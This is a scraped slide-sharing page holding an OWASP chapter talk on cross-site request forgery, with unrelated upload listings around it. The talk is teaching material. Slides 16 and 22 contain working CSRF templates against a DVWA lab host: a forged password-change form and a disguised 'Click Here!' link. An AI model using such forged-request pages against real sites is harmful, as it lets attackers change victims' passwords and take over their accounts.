Cyber security
Cyber securityCyber security
Cyber security
 

Recently uploaded

What’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 UpdatesWhat’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 UpdatesVictoriaMetrics
 
Zer0con 2024 final share short version.pdf
Zer0con 2024 final share short version.pdfZer0con 2024 final share short version.pdf
Zer0con 2024 final share short version.pdfmaor17
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesKrzysztofKkol1
 
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingOpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingShane Coughlan
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfDrew Moseley
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Rob Geurden
 
Keeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository worldKeeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository worldRoberto Pérez Alcolea
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdf
2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdf2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdf
2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdfAndrey Devyatkin
 
SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?Alexandre Beguel
 
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + KobitonLeveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + KobitonApplitools
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZABSYZ Inc
 
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfEnhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfRTS corp
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxRTS corp
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolsosttopstonverter
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxRTS corp
 
2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shardsChristopher Curtin
 

Recently uploaded (20)

What’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 UpdatesWhat’s New in VictoriaMetrics: Q1 2024 Updates
What’s New in VictoriaMetrics: Q1 2024 Updates
 
Zer0con 2024 final share short version.pdf
Zer0con 2024 final share short version.pdfZer0con 2024 final share short version.pdf
Zer0con 2024 final share short version.pdf
 
Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
 
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full RecordingOpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
OpenChain Education Work Group Monthly Meeting - 2024-04-10 - Full Recording
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...
 
Keeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository worldKeeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository world
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdf
2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdf2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdf
2024-04-09 - From Complexity to Clarity - AWS Summit AMS.pdf
 
SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?
 
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + KobitonLeveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfEnhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
 
eSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration toolseSoftTools IMAP Backup Software and migration tools
eSoftTools IMAP Backup Software and migration tools
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
 
2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards2024 DevNexus Patterns for Resiliency: Shuffle shards
2024 DevNexus Patterns for Resiliency: Shuffle shards
 

Understanding CSRF

  • 1. CROSS SITE REQUEST FORGERY UNDERSTANDING John Patrick Lita - OWASP Manila Chapter President Venue: Philippine Army, Cyber Security Division, Taguig City
 OWASP Taguig Chapter
  • 2. DEEP UNDERSTANDING WITH CSRF VULNERABILITY MEET THE PRESENTER OWASP Manila Chapter President
 Project Manager at Enterprise Linux Professionals
 Owner of Active Security Training and Consultancy
 Project leader for 
 OWASP Online Academy john.patrick.lita@owasp.org 2
  • 3. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CROSS SITE REQUEST FORGERY Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 3
  • 4. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 4 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST
  • 5. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 5 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME!
  • 6. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 6 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME! Jaypee: I AM AWESOME!
  • 7. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 7 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
  • 8. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 8 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
  • 9. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 9 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB! Jaypee: I AM NOOB!
  • 10. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CANNOT READ THE ANTI-CSRF 10
  • 11. DEEP UNDERSTANDING WITH CSRF VULNERABILITY NO SERVER SIDE VALIDATION 11
  • 12. DEEP UNDERSTANDING WITH CSRF VULNERABILITY REVIEWING THE FORM 12
  • 13. DEEP UNDERSTANDING WITH CSRF VULNERABILITY THE CHECKING THE SOURCE CODE 13
  • 14. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 15. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE WEB INTERFACE Try to copy the code of the CSRF Template and save it as HTML File. then open the file with any 
 browser you like. then click the submit and analyse the behaviour.
 
 After that try yo login. please proceed to next page for source code. Page 16 15
  • 16. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE SOURCE CODE <!DOCTYPE html> <html>
 <head>
 <title>CSRF Template</title>
 </head>
 <body>
 <br> <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET"> New Password:<br>
 <input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br>
 Confirm New Password: <br>
 <input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br>
 <input type="submit" value="Change" name="Change">
 
 </form>
 </body>
 </html> 16
  • 17. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Using a secret cookie ▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request. 17
  • 18. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Only Accept POST requests ▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else. POST
 REQUEST 18
  • 19. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Multi-Step Transaction
 Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible. ▸ URL Rewriting
 This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user’s session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another. ▸ HTTPS
 HTTPS does nothing to defend against CSRF. 19
  • 20. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 21. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING One of the technique or attack vector is to perform a click jacking attack, to test this attack please 
 proceed on the next page for the source code, then try to executing it by clicking the “Click Here!” 21
  • 22. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING <!DOCTYPE html> <html>
 <title>Please Check your Account Here!</title>
 <head>Check your account Here!</head>
 <body> <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/? password_new=password&password_conf=password&Change=Change#">Click Here!</a>
 
 </body>
 </html>